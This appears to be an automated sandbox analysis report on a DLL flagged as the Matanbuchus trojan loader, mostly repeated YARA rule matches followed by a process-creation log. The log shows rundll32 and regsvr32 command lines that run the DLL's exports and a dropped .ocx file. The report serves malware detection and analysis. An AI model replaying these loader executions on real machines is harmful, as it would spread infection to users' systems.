Source: file.dll, type: SAMPLE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: sslproxydump.pcap, type: PCAP Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 34.2.regsvr32.exe.6b810000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.6d050000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.4910000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 22.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.4910000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000022.00000002.3112823931.000000006B811000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000016.00000002.1885875877.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000012.00000002.3113049716.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: classification engine Classification label: mal100.troj.evad.winDLL@44/7@3/2
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\8f08
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\8f08
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1020:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7588
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\3164e4ff-c709-4dec-a976-0f3f08fd1379
Source: file.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense
Source: file.dll Virustotal: Detection: 16%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\file.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInit
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",CheckLicense
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInit
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Uninitialize
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",ThreadFunction
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Main
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",InitDll
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Init
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllUninitialize
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 608
Source: unknown Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInit
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",CheckLicense
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInit
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Uninitialize
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",ThreadFunction
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Main
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",InitDll
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Init
